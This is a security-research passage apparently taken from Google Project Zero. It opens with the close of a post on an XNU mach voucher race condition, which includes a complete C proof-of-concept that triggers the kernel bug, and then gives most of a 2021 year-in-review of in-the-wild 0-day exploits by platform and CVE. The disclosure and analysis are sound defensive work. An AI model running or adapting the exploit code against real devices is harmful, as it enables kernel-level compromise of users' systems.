Possible, but this vulnerability is quite deep in the code. This would have been a marathon auditing effort to find and determine that it was exploitable. On the other hand this attack surface is reachable from every sandbox making vulnerabilities here very valuable and perhaps worth the investment.

2) Static lock-analysis tooling

This is something which we've discussed within Project Zero over many afternoon coffee chats: could we build a tool to generate a fuzzy mapping between locks and objects which are probably meant to be protected by those locks, and then list any discrepancies where the lock isn't held? In this particular case e_made is only modified in two places; one time the user_data_lock is held and the other time it isn't. Perhaps tooling isn't even required and this could just be a technique used to help guide auditing towards possible race-condition vulnerabilities.

3) Dynamic lock-analysis tooling

Perhaps tools like ThreadSanitizer could be used to dynamically record a mapping between locks and accessed objects/object fields. Such a tool could plausibly have flagged this race condition under normal system use. The false positive rate of such a tool might be unusably high however.

4) Race-condition fuzzer

It's not inconceivable that a coverage-guided fuzzer could have generated the proof-of-concept shown below, though it would specifically have to have been built to execute parallel testcases.

As to what technique was actually used, we don't know. As defenders we need to do a better job making sure that we invest even more effort in all of these possibilities and more.

PoC:

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <pthread.h>

#include <mach/mach.h>

#include <mach/mach_voucher.h>

#include <atm/atm_types.h>

#include <voucher/ipc_pthread_priority_types.h>

// @i41nbeer

static mach_port_t

create_voucher_from_recipe(void* recipe, size_t recipe_size) {

mach_port_t voucher = MACH_PORT_NULL;

kern_return_t kr = host_create_mach_voucher(

mach_host_self(),

(mach_voucher_attr_raw_recipe_array_t)recipe,

recipe_size,

&voucher);

if (kr != KERN_SUCCESS) {

printf("failed to create voucher from recipe\n");

}

return voucher;

}

static void*

create_single_variable_userdata_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

*template_size_out = recipe_size;

return recipe;

}

static void*

create_single_variable_userdata_then_redeem_voucher_recipe(void* buf, size_t len, size_t* template_size_out) {

size_t recipe_size = (2*sizeof(mach_voucher_attr_recipe_data_t)) + len;

mach_voucher_attr_recipe_data_t* recipe = calloc(recipe_size, 1);

recipe->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe->command = MACH_VOUCHER_ATTR_USER_DATA_STORE;

recipe->content_size = len;

uint8_t* content_buf = ((uint8_t*)recipe)+sizeof(mach_voucher_attr_recipe_data_t);

memcpy(content_buf, buf, len);

mach_voucher_attr_recipe_data_t* recipe2 = (mach_voucher_attr_recipe_data_t*)(content_buf + len);

recipe2->key = MACH_VOUCHER_ATTR_KEY_USER_DATA;

recipe2->command = MACH_VOUCHER_ATTR_REDEEM;

*template_size_out = recipe_size;

return recipe;

}

struct recipe_template_meta {

void* recipe;

size_t recipe_size;

};

struct recipe_template_meta single_recipe_template = {};

struct recipe_template_meta redeem_recipe_template = {};

int iter_limit = 100000;

void* s3threadfunc(void* arg) {

struct recipe_template_meta* template = (struct recipe_template_meta*)arg;

for (int i = 0; i < iter_limit; i++) {

mach_port_t voucher_port = create_voucher_from_recipe(template->recipe, template->recipe_size);

mach_port_deallocate(mach_task_self(), voucher_port);

}

return NULL;

}

void sploit_3() {

while(1) {

// choose a userdata size:

uint32_t userdata_size = (arc4random() % 2040)+8;

userdata_size += 7;

userdata_size &= (~7);

printf("userdata size: 0x%x\n", userdata_size);

uint8_t* userdata_buffer = calloc(userdata_size, 1);

((uint32_t*)userdata_buffer)[0] = arc4random();

((uint32_t*)userdata_buffer)[1] = arc4random();

// build the templates:

single_recipe_template.recipe = create_single_variable_userdata_voucher_recipe(userdata_buffer, userdata_size, &single_recipe_template.recipe_size);

redeem_recipe_template.recipe = create_single_variable_userdata_then_redeem_voucher_recipe(userdata_buffer, userdata_size, &redeem_recipe_template.recipe_size);

free(userdata_buffer);

pthread_t single_recipe_thread;

pthread_create(&single_recipe_thread, NULL, s3threadfunc, (void*)&single_recipe_template);

pthread_t redeem_recipe_thread;

pthread_create(&redeem_recipe_thread, NULL, s3threadfunc, (void*)&redeem_recipe_template);

pthread_join(single_recipe_thread, NULL);

pthread_join(redeem_recipe_thread, NULL);

free(single_recipe_template.recipe);

free(redeem_recipe_template.recipe);

}

int main(int argc, char** argv) {

sploit_3();

}

Google Project Zero
The More You Know, The More You Know You Don’t KnowAnonymous
19 April 2022 at 16:06

The More You Know, The More You Know You Don’t Know

Google Project Zero

By: Anonymous

19 April 2022 at 16:06

A Year in Review of 0-days Used In-the-Wild in 2021

Posted by Maddie Stone, Google Project Zero

This is our third annual year in review of 0-days exploited in-the-wild [2020, 2019]. Each year we’ve looked back at all of the detected and disclosed in-the-wild 0-days as a group and synthesized what we think the trends and takeaways are. The goal of this report is not to detail each individual exploit, but instead to analyze the exploits from the year as a group, looking for trends, gaps, lessons learned, successes, etc. If you’re interested in the analysis of individual exploits, please check out our root cause analysis repository.

We perform and share this analysis in order to make 0-day hard. We want it to be more costly, more resource intensive, and overall more difficult for attackers to use 0-day capabilities. 2021 highlighted just how important it is to stay relentless in our pursuit to make it harder for attackers to exploit users with 0-days. We heard over and over and over about how governments were targeting journalists, minoritized populations, politicians, human rights defenders, and even security researchers around the world. The decisions we make in the security and tech communities can have real impacts on society and our fellow humans’ lives.

We’ll provide our evidence and process for our conclusions in the body of this post, and then wrap it all up with our thoughts on next steps and hopes for 2022 in the conclusion. If digging into the bits and bytes is not your thing, then feel free to just check-out the Executive Summary and Conclusion.

Executive Summary

2021 included the detection and disclosure of 58 in-the-wild 0-days, the most ever recorded since Project Zero began tracking in mid-2014. That’s more than double the previous maximum of 28 detected in 2015 and especially stark when you consider that there were only 25 detected in 2020. We’ve tracked publicly known in-the-wild 0-day exploits in this spreadsheet since mid-2014.

While we often talk about the number of 0-day exploits used in-the-wild, what we’re actually discussing is the number of 0-day exploits detected and disclosed as in-the-wild. And that leads into our first conclusion: we believe the large uptick in in-the-wild 0-days in 2021 is due to increased detection and disclosure of these 0-days, rather than simply increased usage of 0-day exploits.

With this record number of in-the-wild 0-days to analyze we saw that attacker methodology hasn’t actually had to change much from previous years. Attackers are having success using the same bug patterns and exploitation techniques and going after the same attack surfaces. Project Zero’s mission is “make 0day hard”. 0-day will be harder when, overall, attackers are not able to use public methods and techniques for developing their 0-day exploits. When we look over these 58 0-days used in 2021, what we see instead are 0-days that are similar to previous & publicly known vulnerabilities. Only two 0-days stood out as novel: one for the technical sophistication of its exploit and the other for its use of logic bugs to escape the sandbox.

So while we recognize the industry’s improvement in the detection and disclosure of in-the-wild 0-days, we also acknowledge that there’s a lot more improving to be done. Having access to more “ground truth” of how attackers are actually using 0-days shows us that they are able to have success by using previously known techniques and methods rather than having to invest in developing novel techniques. This is a clear area of opportunity for the tech industry.

We had so many more data points in 2021 to learn about attacker behavior than we’ve had in the past. Having all this data, though, has left us with even more questions than we had before. Unfortunately, attackers who actively use 0-day exploits do not share the 0-days they’re using or what percentage of 0-days we’re missing in our tracking, so we’ll never know exactly what proportion of 0-days are currently being found and disclosed publicly.

Based on our analysis of the 2021 0-days we hope to see the following progress in 2022 in order to continue taking steps towards making 0-day hard:

All vendors agree to disclose the in-the-wild exploitation status of vulnerabilities in their security bulletins.
Exploit samples or detailed technical descriptions of the exploits are shared more widely.
Continued concerted efforts on reducing memory corruption vulnerabilities or rendering them unexploitable.Launch mitigations that will significantly impact the exploitability of memory corruption vulnerabilities.

A Record Year for In-the-Wild 0-days

2021 was a record year for in-the-wild 0-days. So what happened?

Is it that software security is getting worse? Or is it that attackers are using 0-day exploits more? Or has our ability to detect and disclose 0-days increased? When looking at the significant uptick from 2020 to 2021, we think it's mostly explained by the latter. While we believe there has been a steady growth in interest and investment in 0-day exploits by attackers in the past several years, and that security still needs to urgently improve, it appears that the security industry's ability to detect and disclose in-the-wild 0-day exploits is the primary explanation for the increase in observed 0-day exploits in 2021.

While we often talk about “0-day exploits used in-the-wild”, what we’re actually tracking are “0-day exploits detected and disclosed as used in-the-wild”. There are more factors than just the use that contribute to an increase in that number, most notably: detection and disclosure. Better detection of 0-day exploits and more transparently disclosed exploited 0-day vulnerabilities is a positive indicator for security and progress in the industry.

Overall, we can break down the uptick in the number of in-the-wild 0-days into:

More detection of in-the-wild 0-day exploits
More public disclosure of in-the-wild 0-day exploitation

More detection

In the 2019 Year in Review, we wrote about the “Detection Deficit”. We stated “As a community, our ability to detect 0-days being used in the wild is severely lacking to the point that we can’t draw significant conclusions due to the lack of (and biases in) the data we have collected.” In the last two years, we believe that there’s been progress on this gap.

Anecdotally, we hear from more people that they’ve begun working more on detection of 0-day exploits. Quantitatively, while a very rough measure, we’re also seeing the number of entities credited with reporting in-the-wild 0-days increasing. It stands to reason that if the number of people working on trying to find 0-day exploits increases, then the number of in-the-wild 0-day exploits detected may increase.

We’ve also seen the number of vendors detecting in-the-wild 0-days in their own products increasing. Whether or not these vendors were previously working on detection, vendors seem to have found ways to be more successful in 2021. Vendors likely have the most telemetry and overall knowledge and visibility into their products so it’s important that they are investing in (and hopefully having success in) detecting 0-days targeting their own products. As shown in the chart above, there was a significant increase in the number of in-the-wild 0-days discovered by vendors in their own products. Google discovered 7 of the in-the-wild 0-days in their own products and Microsoft discovered 10 in their products!

More disclosure

The second reason why the number of detected in-the-wild 0-days has increased is due to more disclosure of these vulnerabilities. Apple and Google Android (we differentiate “Google Android” rather than just “Google” because Google Chrome has been annotating their security bulletins for the last few years) first began labeling vulnerabilities in their security advisories with the information about potential in-the-wild exploitation in November 2020 and January 2021 respectively. When vendors don’t annotate their release notes, the only way we know that a 0-day was exploited in-the-wild is if the researcher who discovered the exploitation comes forward. If Apple and Google Android had not begun annotating their release notes, the public would likely not know about at least 7 of the Apple in-the-wild 0-days and 5 of the Android in-the-wild 0-days. Why? Because these vulnerabilities were reported by “Anonymous” reporters. If the reporters didn’t want credit for the vulnerability, it’s unlikely that they would have gone public to say that there were indications of exploitation. That is 12 0-days that wouldn’t have been included in this year’s list if Apple and Google Android had not begun transparently annotating their security advisories.

Kudos and thank you to Microsoft, Google Chrome, and Adobe who have been annotating their security bulletins for transparency for multiple years now! And thanks to Apache who also annotated their release notes for CVE-2021-41773 this past year.

In-the-wild 0-days in Qualcomm and ARM products were annotated as in-the-wild in Android security bulletins, but not in the vendor’s own security advisories.

It's highly likely that in 2021, there were other 0-days that were exploited in the wild and detected, but vendors did not mention this in their release notes. In 2022, we hope that more vendors start noting when they patch vulnerabilities that have been exploited in-the-wild. Until we’re confident that all vendors are transparently disclosing in-the-wild status, there’s a big question of how many in-the-wild 0-days are discovered, but not labeled publicly by vendors.

New Year, Old Techniques

We had a record number of “data points” in 2021 to understand how attackers are actually using 0-day exploits. A bit surprising to us though, out of all those data points, there was nothing new amongst all this data. 0-day exploits are considered one of the most advanced attack methods an actor can use, so it would be easy to conclude that attackers must be using special tricks and attack surfaces. But instead, the 0-days we saw in 2021 generally followed the same bug patterns, attack surfaces, and exploit “shapes” previously seen in public research. Once “0-day is hard”, we’d expect that to be successful, attackers would have to find new bug classes of vulnerabilities in new attack surfaces using never before seen exploitation methods. In general, that wasn't what the data showed us this year. With two exceptions (described below in the iOS section) out of the 58, everything we saw was pretty “meh” or standard.

Out of the 58 in-the-wild 0-days for the year, 39, or 67% were memory corruption vulnerabilities. Memory corruption vulnerabilities have been the standard for attacking software for the last few decades and it’s still how attackers are having success. Out of these memory corruption vulnerabilities, the majority also stuck with very popular and well-known bug classes:

17 use-after-free
6 out-of-bounds read & write
4 buffer overflow
4 integer overflow

In the next sections we’ll dive into each major platform that we saw in-the-wild 0-days for this year. We’ll share the trends and explain why what we saw was pretty unexceptional.

Chromium (Chrome)

Chromium had a record high number of 0-days detected and disclosed in 2021 with 14. Out of these 14, 10 were renderer remote code execution bugs, 2 were sandbox escapes, 1 was an infoleak, and 1 was used to open a webpage in Android apps other than Google Chrome.

The 14 0-day vulnerabilities were in the following components:

6 JavaScript Engine - v8 (CVE-2021-21148, CVE-2021-30551, CVE-2021-30563, CVE-2021-30632, CVE-2021-37975, CVE-2021-38003)
2 DOM Engine - Blink (CVE-2021-21193 & CVE-2021-21206)
1 WebGL (CVE-2021-30554)
1 IndexedDB (CVE-2021-30633)
1 webaudio (CVE-2021-21166)
1 Portals (CVE-2021-37973)
1 Android Intents (CVE-2021-38000)
1 Core (CVE-2021-37976)

When we look at the components targeted by these bugs, they’re all attack surfaces seen before in public security research and previous exploits. If anything, there are a few less DOM bugs and more targeting these other components of browsers like IndexedDB and WebGL than previously. 13 out of the 14 Chromium 0-days were memory corruption bugs. Similar to last year, most of those memory corruption bugs are use-after-free vulnerabilities.

A couple of the Chromium bugs were even similar to previous in-the-wild 0-days. CVE-2021-21166 is an issue in ScriptProcessorNode::Process() in webaudio where there’s insufficient locks such that buffers are accessible in both the main thread and the audio rendering thread at the same time. CVE-2019-13720 is an in-the-wild 0-day from 2019. It was a vulnerability in ConvolverHandler::Process() in webaudio where there were also insufficient locks such that a buffer was accessible in both the main thread and the audio rendering thread at the same time.

CVE-2021-30632 is another Chromium in-the-wild 0-day from 2021. It’s a type confusion in the TurboFan JIT in Chromium’s JavaScript Engine, v8, where Turbofan fails to deoptimize code after a property map is changed. CVE-2021-30632 in particular deals with code that stores global properties. CVE-2020-16009 was also an in-the-wild 0-day that was due to Turbofan failing to deoptimize code after map deprecation.

WebKit (Safari)

Prior to 2021, Apple had only acknowledged 1 publicly known in-the-wild 0-day targeting WebKit/Safari, and that was due the sharing by an external researcher. In 2021 there were 7. This makes it hard for us to assess trends or changes since we don’t have historical samples to go off of. Instead, we’ll look at 2021’s WebKit bugs in the context of other Safari bugs not known to be in-the-wild and other browser in-the-wild 0-days.

The 7 in-the-wild 0-days targeted the following components:

4 Javascript Engine - JavaScript Core (CVE-2021-1870, CVE-2021-1871, CVE-2021-30663, CVE-2021-30665)

1 IndexedDB (CVE-2021-30858)
1 Storage (CVE-2021-30661)
1 Plugins (CVE-2021-1879)

The one semi-surprise is that no DOM bugs were detected and disclosed. In previous years, vulnerabilities in the DOM engine have generally made up 15-20% of the in-the-wild browser 0-days, but none were detected and disclosed for WebKit in 2021.

It would not be surprising if attackers are beginning to shift to other modules, like third party libraries or things like IndexedDB. The modules may be more promising to attackers going forward because there’s a better chance that the vulnerability may exist in multiple browsers or platforms. For example, the webaudio bug in Chromium, CVE-2021-21166, also existed in WebKit and was fixed as CVE-2021-1844, though there was no evidence it was exploited in-the-wild in WebKit. The IndexedDB in-the-wild 0-day that was used against Safari in 2021, CVE-2021-30858, was very, very similar to a bug fixed in Chromium in January 2020.

Internet Explorer

Since we began tracking in-the-wild 0-days, Internet Explorer has had a pretty consistent number of 0-days each year. 2021 actually tied 2016 for the most in-the-wild Internet Explorer 0-days we’ve ever tracked even though Internet Explorer’s market share of web browser users continues to decrease.

So why are we seeing so little change in the number of in-the-wild 0-days despite the change in market share? Internet Explorer is still a ripe attack surface for initial entry into Windows machines, even if the user doesn’t use Internet Explorer as their Internet browser. While the number of 0-days stayed pretty consistent to what we’ve seen in previous years, the components targeted and the delivery methods of the exploits changed. 3 of the 4 0-days seen in 2021 targeted the MSHTML browser engine and were delivered via methods other than the web. Instead they were delivered to targets via Office documents or other file formats.

The four 0-days targeted the following components:

MSHTML browser engine (CVE-2021-26411, CVE-2021-33742, CVE-2021-40444)
Javascript Engine - JScript9 (CVE-2021-34448)

For CVE-2021-26411 targets of the campaign initially received a .mht file, which prompted the user to open in Internet Explorer. Once it was opened in Internet Explorer, the exploit was downloaded and run. CVE-2021-33742 and CVE-2021-40444 were delivered to targets via malicious Office documents.

CVE-2021-26411 and CVE-2021-33742 were two common memory corruption bug patterns: a use-after-free due to a user controlled callback in between two actions using an object and the user frees the object during that callback and a buffer overflow.

There were a few different vulnerabilities used in the exploit chain that used CVE-2021-40444, but the one within MSHTML was that as soon as the Office document was opened the payload would run: a CAB file was downloaded, decompressed, and then a function from within a DLL in that CAB was executed. Unlike the previous two MSHTML bugs, this was a logic error in URL parsing rather than a memory corruption bug.

Windows

Windows is the platform where we’ve seen the most change in components targeted compared with previous years. However, this shift has generally been in progress for a few years and predicted with the end-of-life of Windows 7 in 2020 and thus why it’s still not especially novel.

In 2021 there were 10 Windows in-the-wild 0-days targeting 7 different components:

2 Enhanced crypto provider (CVE-2021-31199, CVE-2021-31201)
2 NTOS kernel (CVE-2021-33771, CVE-2021-31979)
2 Win32k (CVE-2021-1732, CVE-2021-40449)
1 Windows update medic (CVE-2021-36948)
1 SuperFetch (CVE-2021-31955)
1 dwmcore.dll (CVE-2021-28310)

1 ntfs.sys (CVE-2021-31956)

The number of different components targeted is the shift from past years. For example, in 2019 75% of Windows 0-days targeted Win32k while in 2021 Win32k only made up 20% of the Windows 0-days. The reason that this was expected and predicted was that 6 out of 8 of those 0-days that targeted Win32k in 2019 did not target the latest release of Windows 10 at that time; they were targeting older versions. With Windows 10 Microsoft began dedicating more and more resources to locking down the attack surface of Win32k so as those older versions have hit end-of-life, Win32k is a less and less attractive attack surface.

Similar to the many Win32k vulnerabilities seen over the years, the two 2021 Win32k in-the-wild 0-days are due to custom user callbacks. The user calls functions that change the state of an object during the callback and Win32k does not correctly handle those changes. CVE-2021-1732 is a type confusion vulnerability due to a user callback in xxxClientAllocWindowClassExtraBytes which leads to out-of-bounds read and write. If NtUserConsoleControl is called during the callback a flag is set in the window structure to signal that a field is an offset into the kernel heap. xxxClientAllocWindowClassExtraBytes doesn’t check this and writes that field as a user-mode pointer without clearing the flag. The first in-the-wild 0-day detected and disclosed in 2022, CVE-2022-21882, is due to CVE-2021-1732 actually not being fixed completely. The attackers found a way to bypass the original patch and still trigger the vulnerability. CVE-2021-40449 is a use-after-free in NtGdiResetDC due to the object being freed during the user callback.

iOS/macOS

As discussed in the “More disclosure” section above, 2021 was the first full year that Apple annotated their release notes with in-the-wild status of vulnerabilities. 5 iOS in-the-wild 0-days were detected and disclosed this year. The first publicly known macOS in-the-wild 0-day (CVE-2021-30869) was also found. In this section we’re going to discuss iOS and macOS together because: 1) the two operating systems include similar components and 2) the sample size for macOS is very small (just this one vulnerability).

For the 5 total iOS and macOS in-the-wild 0-days, they targeted 3 different attack surfaces:

IOMobileFrameBuffer (CVE-2021-30807, CVE-2021-30883)
XNU Kernel (CVE-2021-1782 & CVE-2021-30869)
CoreGraphics (CVE-2021-30860)
CommCenter (FORCEDENTRY sandbox escape - CVE requested, not yet assigned)

These 4 attack surfaces are not novel. IOMobileFrameBuffer has been a target of public security research for many years. For example, the Pangu Jailbreak from 2016 used CVE-2016-4654, a heap buffer overflow in IOMobileFrameBuffer. IOMobileFrameBuffer manages the screen’s frame buffer. For iPhone 11 (A13) and below, IOMobileFrameBuffer was a kernel driver. Beginning with A14, it runs on a coprocessor, the DCP. It’s a popular attack surface because historically it’s been accessible from sandboxed apps. In 2021 there were two in-the-wild 0-days in IOMobileFrameBuffer. CVE-2021-30807 is an out-of-bounds read and CVE-2021-30883 is an integer overflow, both common memory corruption vulnerabilities. In 2022, we already have another in-the-wild 0-day in IOMobileFrameBuffer, CVE-2022-22587.

One iOS 0-day and the macOS 0-day both exploited vulnerabilities in the XNU kernel and both vulnerabilities were in code related to XNU’s inter-process communication (IPC) functionality. CVE-2021-1782 exploited a vulnerability in mach vouchers while CVE-2021-30869 exploited a vulnerability in mach messages. This is not the first time we’ve seen iOS in-the-wild 0-days, much less public security research, targeting mach vouchers and mach messages. CVE-2019-6625 was exploited as a part of an exploit chain targeting iOS 11.4.1-12.1.2 and was also a vulnerability in mach vouchers.

Mach messages have also been a popular target for public security research. In 2020 there were two in-the-wild 0-days also in mach messages: CVE-2020-27932 & CVE-2020-27950. This year’s CVE-2021-30869 is a pretty close variant to 2020’s CVE-2020-27932. Tielei Wang and Xinru Chi actually presented on this vulnerability at zer0con 2021 in April 2021. In their presentation, they explained that they found it while doing variant analysis on CVE-2020-27932. TieLei Wang explained via Twitter that they had found the vulnerability in December 2020 and had noticed it was fixed in beta versions of iOS 14.4 and macOS 11.2 which is why they presented it at Zer0Con. The in-the-wild exploit only targeted macOS 10, but used the same exploitation technique as the one presented.

The two FORCEDENTRY exploits (CVE-2021-30860 and the sandbox escape) were the only times that made us all go “wow!” this year. For CVE-2021-30860, the integer overflow in CoreGraphics, it was because:

For years we’ve all heard about how attackers are using 0-click iMessage bugs and finally we have a public example, and
The exploit was an impressive work of art.

The sandbox escape (CVE requested, not yet assigned) was impressive because it’s one of the few times we’ve seen a sandbox escape in-the-wild that uses only logic bugs, rather than the standard memory corruption bugs.

For CVE-2021-30860, the vulnerability itself wasn’t especially notable: a classic integer overflow within the JBIG2 parser of the CoreGraphics PDF decoder. The exploit, though, was described by Samuel Groß & Ian Beer as “one of the most technically sophisticated exploits [they]’ve ever seen”. Their blogpost shares all the details, but the highlight is that the exploit uses the logical operators available in JBIG2 to build NAND gates which are used to build its own computer architecture. The exploit then writes the rest of its exploit using that new custom architecture. From their blogpost:

Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

This is an example of what making 0-day exploitation hard could look like: attackers having to develop a new and novel way to exploit a bug and that method requires lots of expertise and/or time to develop. This year, the two FORCEDENTRY exploits were the only 0-days out of the 58 that really impressed us. Hopefully in the future, the bar has been raised such that this will be required for any successful exploitation.

Android

There were 7 Android in-the-wild 0-days detected and disclosed this year. Prior to 2021 there had only been 1 and it was in 2019: CVE-2019-2215. Like WebKit, this lack of data makes it hard for us to assess trends and changes. Instead, we’ll compare it to public security research.

For the 7 Android 0-days they targeted the following components:

Qualcomm Adreno GPU driver (CVE-2020-11261, CVE-2021-1905, CVE-2021-1906)
ARM Mali GPU driver (CVE-2021-28663, CVE-2021-28664)
Upstream Linux kernel (CVE-2021-1048, CVE-2021-0920)

5 of the 7 0-days from 2021 targeted GPU drivers. This is actually not that surprising when we consider the evolution of the Android ecosystem as well as recent public security research into Android. The Android ecosystem is quite fragmented: many different kernel versions, different manufacturer customizations, etc. If an attacker wants a capability against “Android devices”, they generally need to maintain many different exploits to have a decent percentage of the Android ecosystem covered. However, if the attacker chooses to target the GPU kernel driver instead of another component, they will only need to have two exploits since most Android devices use 1 of 2 GPUs: either the Qualcomm Adreno GPU or the ARM Mali GPU.

Public security research mirrored this choice in the last couple of years as well. When developing full exploit chains (for defensive purposes) to target Android devices, Guang Gong, Man Yue Mo, and Ben Hawkes all chose to attack the GPU kernel driver for local privilege escalation. Seeing the in-the-wild 0-days also target the GPU was more of a confirmation rather than a revelation. Of the 5 0-days targeting GPU drivers, 3 were in the Qualcomm Adreno driver and 2 in the ARM Mali driver.

The two non-GPU driver 0-days (CVE-2021-0920 and CVE-2021-1048) targeted the upstream Linux kernel. Unfortunately, these 2 bugs shared a singular characteristic with the Android in-the-wild 0-day seen in 2019: all 3 were previously known upstream before their exploitation in Android. While the sample size is small, it’s still quite striking to see that 100% of the known in-the-wild Android 0-days that target the kernel are bugs that actually were known about before their exploitation.

The vulnerability now referred to as CVE-2021-0920 was actually found in September 2016 and discussed on the Linux kernel mailing lists. A patch was even developed back in 2016, but it didn’t end up being submitted. The bug was finally fixed in the Linux kernel in July 2021 after the detection of the in-the-wild exploit targeting Android. The patch then made it into the Android security bulletin in November 2021.

CVE-2021-1048 remained unpatched in Android for 14 months after it was patched in the Linux kernel. The Linux kernel was actually only vulnerable to the issue for a few weeks, but due to Android patching practices, that few weeks became almost a year for some Android devices. If an Android OEM synced to the upstream kernel, then they likely were patched against the vulnerability at some point. But many devices, such as recent Samsung devices, had not and thus were left vulnerable.

Microsoft Exchange Server

In 2021, there were 5 in-the-wild 0-days targeting Microsoft Exchange Server. This is the first time any Exchange Server in-the-wild 0-days have been detected and disclosed since we began tracking in-the-wild 0-days. The first four (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) were all disclosed and patched at the same time and used together in a single operation. The fifth (CVE-2021-42321) was patched on its own in November 2021. CVE-2021-42321 was demonstrated at Tianfu Cup and then discovered in-the-wild by Microsoft. While no other in-the-wild 0-days were disclosed as part of the chain with CVE-2021-42321, the attackers would have required at least another 0-day for successful exploitation since CVE-2021-42321 is a post-authentication bug.

Of the four Exchange in-the-wild 0-days used in the first campaign, CVE-2021-26855, which is also known as “ProxyLogon”, is the only one that’s pre-auth. CVE-2021-26855 is a server side request forgery (SSRF) vulnerability that allows unauthenticated attackers to send arbitrary HTTP requests as the Exchange server. The other three vulnerabilities were post-authentication. For example, CVE-2021-26858 and CVE-2021-27065 allowed attackers to write arbitrary files to the system. CVE-2021-26857 is a remote code execution vulnerability due to a deserialization bug in the Unified Messaging service. This allowed attackers to run code as the privileged SYSTEM user.

For the second campaign, CVE-2021-42321, like CVE-2021-26858, is a post-authentication RCE vulnerability due to insecure deserialization. It seems that while attempting to harden Exchange, Microsoft inadvertently introduced another deserialization vulnerability.

While there were a significant amount of 0-days in Exchange detected and disclosed in 2021, it’s important to remember that they were all used as 0-day in only two different campaigns. This is an example of why we don’t suggest using the number of 0-days in a product as a metric to assess the security of a product. Requiring the use of four 0-days for attackers to have success is preferable to an attacker only needing one 0-day to successfully gain access.

While this is the first time Exchange in-the-wild 0-days have been detected and disclosed since Project Zero began our tracking, this is not unexpected. In 2020 there was n-day exploitation of Exchange Servers. Whether this was the first year that attackers began the 0-day exploitation or if this was the first year that defenders began detecting the 0-day exploitation, this is not an unexpected evolution and we’ll likely see it continue into 2022.

Outstanding Questions

While there has been progress on detection and disclosure, that progress has shown just how much work there still is to do. The more data we gained, the more questions that arose about biases in detection, what we’re missing and why, and the need for more transparency from both vendors and researchers.

Until the day that attackers decide to happily share all their exploits with us, we can’t fully know what percentage of 0-days are publicly known about. However when we pull together our expertise as security researchers and anecdotes from others in the industry, it paints a picture of some of the data we’re very likely missing. From that, these are some of the key questions we’re asking ourselves as we move into 2022:

Where are the [x] 0-days?

Despite the number of 0-days found in 2021, there are key targets missing from the 0-days discovered. For example, we know that messaging applications like WhatsApp, Signal, Telegram, etc. are targets of interest to attackers and yet there’s only 1 messaging app, in this case iMessage, 0-day found this past year. Since we began tracking in mid-2014 the total is two: a WhatsApp 0-day in 2019 and this iMessage 0-day found in 2021.

Along with messaging apps, there are other platforms/targets we’d expect to see 0-days targeting, yet there are no or very few public examples. For example, since mid-2014 there’s only one in-the-wild 0-day each for macOS and Linux. There are no known in-the-wild 0-days targeting cloud, CPU vulnerabilities, or other phone components such as the WiFi chip or the baseband.

This leads to the question of whether these 0-days are absent due to lack of detection, lack of disclosure, or both?

Do some vendors have no known in-the-wild 0-days because they’ve never been found or because they don’t publicly disclose?

Unless a vendor has told us that they will publicly disclose exploitation status for all vulnerabilities in their platforms, we, the public, don’t know if the absence of an annotation means that there is no known exploitation of a vulnerability or if there is, but the vendor is just not sharing that information publicly. Thankfully this question is something that has a pretty clear solution: all device and software vendors agreeing to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited in-the-wild.

Are we seeing the same bug patterns because that’s what we know how to detect?

As we described earlier in this report, all the 0-days we saw in 2021 had similarities to previously seen vulnerabilities. This leads us to wonder whether or not that’s actually representative of what attackers are using. Are attackers actually having success exclusively using vulnerabilities in bug classes and components that are previously public? Or are we detecting all these 0-days with known bug patterns because that’s what we know how to detect? Public security research would suggest that yes, attackers are still able to have success with using vulnerabilities in known components and bug classes the majority of the time. But we’d still expect to see a few novel and unexpected vulnerabilities in the grouping. We posed this question back in the 2019 year-in-review and it still lingers.

Where are the spl0itz?

To successfully exploit a vulnerability there are two key pieces that make up that exploit: the vulnerability being exploited, and the exploitation method (how that vulnerability is turned into something useful).

Unfortunately, this report could only really analyze one of these components: the vulnerability. Out of the 58 0-days, only 5 have an exploit sample publicly available. Discovered in-the-wild 0-days are the failure case for attackers and a key opportunity for defenders to learn what attackers are doing and make it harder, more time-intensive, more costly, to do it again. Yet without the exploit sample or a detailed technical write-up based upon the sample, we can only focus on fixing the vulnerability rather than also mitigating the exploitation method. This means that attackers are able to continue to use their existing exploit methods rather than having to go back to the design and development phase to build a new exploitation method. While acknowledging that sharing exploit samples can be challenging (we have that challenge too!), we hope in 2022 there will be more sharing of exploit samples or detailed technical write-ups so that we can come together to use every possible piece of information to make it harder for the attackers to exploit more users.

As an aside, if you have an exploit sample that you’re willing to share with us, please reach out. Whether it’s sharing with us and having us write a detailed technical description and analysis or having us share it publicly, we’d be happy to work with you.

Conclusion

Looking back on 2021, what comes to mind is “baby steps”. We can see clear industry improvement in the detection and disclosure of 0-day exploits. But the better detection and disclosure has highlighted other opportunities for progress. As an industry we’re not making 0-day hard. Attackers are having success using vulnerabilities similar to what we’ve seen previously and in components that have previously been discussed as attack surfaces.The goal is to force attackers to start from scratch each time we detect one of their exploits: they’re forced to discover a whole new vulnerability, they have to invest the time in learning and analyzing a new attack surface, they must develop a brand new exploitation method. And while we made distinct progress in detection and disclosure it has shown us areas where that can continue to improve.

While this all may seem daunting, the promising part is that we’ve done it before: we have made clear progress on previously daunting goals. In 2019, we discussed the large detection deficit for 0-day exploits and 2 years later more than double were detected and disclosed. So while there is still plenty more work to do, it’s a tractable problem. There are concrete steps that the tech and security industries can take to make it even more progress:

Make it an industry standard behavior for all vendors to publicly disclose when there is evidence to suggest that a vulnerability in their product is being exploited,
